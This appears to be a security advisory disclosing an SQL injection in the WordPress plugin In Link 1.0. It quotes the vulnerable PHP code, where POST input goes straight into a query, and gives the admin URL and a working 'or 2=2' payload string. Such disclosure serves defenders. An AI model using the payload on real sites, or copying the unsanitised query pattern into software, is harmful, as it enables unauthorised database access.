Vulnerability Type:

SQL injection is POST parameter "keyword"

Affected plugin:
---------------------------------------
In Link
Version: 1.0
Requires WordPress Version: 2.8 or higher
Compatible up to: 2.8
URL: https://wordpress.org/plugins/inlinks/
(plugin has been closed after the report)
---------------------------------------

Affected file inlinks/inlinks.php

Affected lines:

58     $Keyword = trim($_POST['keyword']);
  59     $URL = trim($_POST['url']);
  60     $Rel = trim($_POST['rel']);
  61     $Target = trim($_POST['target']);
  62     $table_name = $wpdb->prefix ."URLKeywordsMapping";
  63     $SelectKeywordURLMappingDetails = "select * from $table_name 
where FldKeyword LIKE '".$Keyword."'" ;
  64
  65     $KeywordURLMappingDetails = 
$wpdb->get_results($SelectKeywordURLMappingDetails);
  66
  67     if(count($KeywordURLMappingDetails))
  68     {
  69         $Message = "<div align='center' style=\"color:red; 
font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in 
the table.</div>";
  70     }

More issues seems to exist in the plugin, because of lack of input 
validation and the lack of use of prepared statements.

Affected URL:

/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):
keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add

Tested against:

  * In Link 1.0
  * WordPress 4.9
  * mysql  Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine
    wrapper
  * PHP 7.0.22-0ubuntu0.16.04.1